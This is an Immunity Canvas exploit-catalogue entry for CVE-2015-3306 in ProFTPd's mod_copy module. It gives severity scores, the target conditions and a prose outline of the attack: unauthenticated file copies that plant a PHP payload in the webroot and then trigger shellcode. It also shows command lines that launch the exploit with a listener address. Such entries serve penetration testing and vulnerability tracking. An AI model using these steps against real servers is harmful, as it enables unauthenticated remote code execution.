
Immunity Canvas: PROFTPD_MOD_COPY

2015-05-18 15:59:00
Immunity Canvas
exploitlist.immunityinc.com
1826

CVSS2: 10 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.973 High
Percentile: 99.8%

Name: proftpd_mod_copy
CVE: CVE-2015-3306
Exploit Pack
VENDOR:
NOTES:

This exploit abuses the commands of the mod_copy module in ProFTPd (version <= 1.3.5). The SITE CPFR/CPTO commands can be used by unauthenticated clients to copy files from any part of the filesystem to a chosen destination. With these commands the mod_copy module allows remote attackers to read and write local files.
In the first part of the attack, the exploit copies /proc/self/cmdline to the /tmp/ folder with a PHP payload as the filename, then copies this file to the webroot as a PHP file.
The second part of the attack involves making a GET request to the PHP file just created with the PHP shellcode as a parameter. The payload created in the first part will execute the PHP shellcode.

Note about the target:
To exploit this vulnerability, the mod_copy module must be compiled with ProFTPd's sources. Also, we need write privileges on the webroot folder we choose (unless the FTP server was started as root).
We must also assume that the webserver has a PHP module.

This exploit has been tested on:

  • Ubuntu 13.04 - Linux 3.8.0-19-generic x64. (Successful exploitation)

Command line usage:
$ ./commandlineInterface.py -l 172.16.135.238 -p5556 -v 7
$ python ./exploits/remote/unix/proftpd_mod_copy/proftpd_mod_copy.py -t 172.16.135.238 -l 172.16.135.1 -d 5556

Repeatability: Infinite
References: http://bugs.proftpd.org/show_bug.cgi?id=4169
CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306
CERT Advisory: None
Date Public: 05/18/2015
CVSS: 10
